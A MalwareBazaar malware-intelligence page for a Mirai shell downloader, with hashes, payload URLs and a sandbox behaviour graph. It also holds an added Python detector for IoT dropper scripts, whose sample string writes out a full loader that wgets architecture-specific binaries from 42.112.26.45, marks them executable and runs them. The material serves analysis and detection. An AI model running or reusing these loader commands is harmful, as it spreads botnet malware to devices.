MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Mirai


Vendor detections: 5



SHA256 hash: 900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6
SHA3-384 hash: 1dd27c40e542266ae6091bd07c897e6fdb5f798adb6a09a5669d23d016a87687a84f0a66e03bc9701fe3bf874b83364f
SHA1 hash: e8db329ccd5864b65777e3407e59d169b35e8718
MD5 hash: 88c3d07952a1a26d68ac44bd17e184e8
humanhash: single-ack-minnesota-muppet
File name: tvt.sh
Signature: Mirai
File size: 883 bytes
First seen: 2025-10-31 00:15:31 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 24:ToWBGhBh9Mk8QoWkp+VE+/I/V7nzf5XplHL:ToGGhL8QoWLVE+wV7zfVptL
TLSH: T199119999D98197A48456192D71C7C21DF0A3C3EC26E22B08FC4C2E387BCC588F831EB5
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: sh
URL                        Malware sample (SHA256 hash)                                        Signature  Tags
http://42.112.26.45/arm    18b40a18fe04c05ee7bbdc7a07125633eb803dd7cd9f198e89a2b824df628c5c    Mirai      elf mirai ua-wget
http://42.112.26.45/arm5   be61d9c23d4359b4a4d4911f0f8fc09f69124f3cf991856d5c871e23568c5cd2    Mirai      elf mirai ua-wget
http://42.112.26.45/arm7   48f8ba323a18feb719e4cba9d502e85a73e89c0e7d4c6a5b2dae7e808b19f692    Mirai      elf mirai ua-wget
http://42.112.26.45/mips   0b92cb77fec808a81df7037d623f112a33c759a5f7cf13681d2ff71c8471fcef    Mirai      elf gafgyt mirai ua-wget
http://42.112.26.45/mpsl   6a731d8ed31ee578f3cd6359cf61f1f115284166b35d99cde278241cbba03f37    Gafgyt     elf gafgyt mirai ua-wget

Intelligence


File Origin
# of uploads: 1
# of downloads: 46
Origin country: DE

Vendor Threat Intelligence
Verdict: Malicious
File Type: unix shell
First seen: 2025-10-30T22:28:00Z UTC
Last seen: 2025-10-31T05:01:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph:
  /usr/bin/sudo (pid 2953)
  `- /tmp/sample.bin (pid 2956, the script itself; every child below is an execve except the dash clones)
     |- round 1: rm (2974) -> wget (2976; net, send-data, write-file) -> chmod (3110) -> dash clone (3112)
     |- round 2: rm (3119) -> wget (3121; net, send-data, write-file) -> chmod (3208) -> dash clone (3209)
     |- round 3: rm (3211) -> wget (3212; net, send-data, write-file) -> chmod (3279) -> dash clone (3281)
     |- round 4: rm (3284) -> wget (3286; net, send-data, write-file) -> chmod (3392) -> dash clone (3394)
     |- round 5: rm (3397) -> wget (3398; net, send-data, no write-file) -> chmod (3447)
     `- /tmp/sdvsdthj (pid 3449, execve)
  Network: each of the five wget processes sends one request to 42.112.26.45:80 (130 B from pid 2976, 131 B from each of the other four).
Threat name: Script-Shell.Downloader.Heuristic
Status: Malicious
First seen: 2025-10-31 00:16:01 UTC
File Type: Text (Shell)
AV detection: 13 of 36 (36.11%)
Threat level: 2/5

Result
Malware family: n/a
Score: 9/10
Tags: antivm credential_access defense_evasion discovery linux
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads process memory
Enumerates running processes
File and Directory Permissions Modification
Executes dropped EXE
Renames itself
Contacts a large number (28596) of remote hosts
Creates a large amount of network flows
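The behaviour graph above and the IOC table show the classic IoT loader pattern: cd into a writable directory, then for each CPU target rm the previous file, wget the payload from the same host, chmod it, run it, and move on. The script below is an added example, not MalwareBazaar's code and not the contents of tvt.sh: a heuristic that splits a shell script into simple commands, looks for that download/chmod/execute/cleanup chain and for several architecture-named payloads from one host, and returns the extracted hosts, URLs and dropped file names alongside a score. SAMPLE_DROPPER is constructed to mirror the graph (the 42.112.26.45 paths and the sdvsdthj name come from this page; the directory list, ordering and scoring weights are assumptions), and SAMPLE_BENIGN uses the placeholder host example.com.

```python
"""Heuristic detector for multi-architecture IoT dropper scripts (added example).

SAMPLE_DROPPER is CONSTRUCTED to mirror the behaviour graph on this page
(rm -> wget -> chmod -> exec per payload on 42.112.26.45, ending with
/tmp/sdvsdthj); it is not the contents of tvt.sh. Directories, ordering
and the scoring weights are assumptions.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Payload names Mirai/Gafgyt loaders serve, one per CPU target. This page
# lists arm, arm5, arm7, mips and mpsl; the rest are other common ones.
KNOWN_ARCHES = {"arm", "arm5", "arm6", "arm7", "mips", "mpsl", "x86", "x86_64",
                "i586", "i686", "sh4", "m68k", "ppc", "spc", "sparc", "arc"}
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
WRITABLE_DIRS = {"", "/tmp", "/var/run", "/mnt", "/dev/shm"}   # "" means "/"
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\";|&]+")
SPLIT_RE = re.compile(r"\n|;|&&|\|\||\|")
WEIGHTS = {"cd_writable": 1, "download": 1, "multi_arch": 2,   # assumed weights
           "chmod_exec": 1, "exec_dropped": 2, "cleanup": 1}

SAMPLE_DROPPER = r"""
cd /tmp || cd /var/run || cd /mnt || cd /
rm -rf sdvsdthj; wget http://42.112.26.45/arm -O sdvsdthj; chmod +x sdvsdthj; ./sdvsdthj
rm -rf sdvsdthj; wget http://42.112.26.45/arm5 -O sdvsdthj; chmod +x sdvsdthj; ./sdvsdthj
rm -rf sdvsdthj; wget http://42.112.26.45/arm7 -O sdvsdthj; chmod +x sdvsdthj; ./sdvsdthj
rm -rf sdvsdthj; wget http://42.112.26.45/mips -O sdvsdthj; chmod +x sdvsdthj; ./sdvsdthj
rm -rf sdvsdthj; wget http://42.112.26.45/mpsl -O sdvsdthj; chmod +x sdvsdthj; ./sdvsdthj
rm -rf sdvsdthj
"""
# Constructed benign installer for contrast (example.com is a placeholder host).
SAMPLE_BENIGN = ("cd /opt/app && wget https://example.com/app.tar.gz -O app.tar.gz"
                 " && tar xzf app.tar.gz\n")


@dataclass
class DropperReport:
    indicators: set = field(default_factory=set)
    urls: list = field(default_factory=list)
    hosts: set = field(default_factory=set)
    arches: list = field(default_factory=list)
    dropped: set = field(default_factory=set)   # file names the script writes

    @property
    def score(self) -> int:
        return sum(WEIGHTS[i] for i in self.indicators)

    @property
    def verdict(self) -> str:
        if self.score >= 5:
            return "dropper"
        return "suspicious" if self.score >= 3 else "clean"


def _commands(script):
    """Yield each simple command as a token list, splitting on newline ; && || |."""
    for raw in SPLIT_RE.split(script):
        toks = raw.strip().split()
        if toks:
            yield toks


def _output_name(toks, default):
    """File written by a wget/curl command: the -O/-o argument, else the URL basename."""
    for flag in ("-O", "-o"):
        if flag in toks and toks.index(flag) + 1 < len(toks):
            return toks[toks.index(flag) + 1].rsplit("/", 1)[-1]
    return default


def analyze_script(script: str) -> DropperReport:
    rep = DropperReport()
    for toks in _commands(script):
        if toks[0] == "busybox" and len(toks) > 1:     # "busybox wget ..." on IoT boxes
            toks = toks[1:]
        cmd = toks[0]
        if cmd in DOWNLOADERS:
            for url in URL_RE.findall(" ".join(toks)):
                p = urlparse(url)
                base = p.path.rsplit("/", 1)[-1]
                rep.urls.append(url)
                rep.hosts.add(p.hostname)
                if base in KNOWN_ARCHES:
                    rep.arches.append(base)
                rep.dropped.add(_output_name(toks, base))
                rep.indicators.add("download")
        elif cmd == "chmod" and len(toks) > 1 and ("+x" in toks[1] or toks[1][0].isdigit()):
            rep.indicators.add("chmod_exec")
        elif cmd == "rm" and any(t.startswith("-") and "r" in t for t in toks[1:]):
            rep.indicators.add("cleanup")
        elif cmd == "cd" and len(toks) > 1 and toks[1].rstrip("/") in WRITABLE_DIRS:
            rep.indicators.add("cd_writable")
        else:
            # Running a file the script itself fetched is the strongest single signal.
            target = toks[1] if cmd in ("sh", "dash", "bash") and len(toks) > 1 else cmd
            if target.rsplit("/", 1)[-1] in rep.dropped:
                rep.indicators.add("exec_dropped")
    if len(set(rep.arches)) >= 2:      # one loader, several CPU targets: Mirai-style
        rep.indicators.add("multi_arch")
    return rep


if __name__ == "__main__":
    for label, text in (("constructed dropper", SAMPLE_DROPPER),
                        ("constructed benign", SAMPLE_BENIGN)):
        r = analyze_script(text)
        print(f"{label}: {r.verdict} (score {r.score}) hosts={sorted(r.hosts)} "
              f"arches={r.arches} dropped={sorted(r.dropped)}")
```

The constructed dropper scores on every indicator (cd into /tmp, five downloads from one host naming five architectures, chmod, execution of the file it just wrote, rm cleanup) and yields the host and URLs as ready-made IOCs, whereas the benign installer only triggers the neutral "download" indicator. The splitter is deliberately simple (no quoting or variable expansion), so a loader that builds its URLs from shell variables would need the variables resolved first.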
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Distributed via web download
Signature: Mirai
File type: sh
SHA256 hash: 900b9e804661b6d24721081a2bd6a22b356d5aebb815e02f086cbc45edfddec6 (this sample)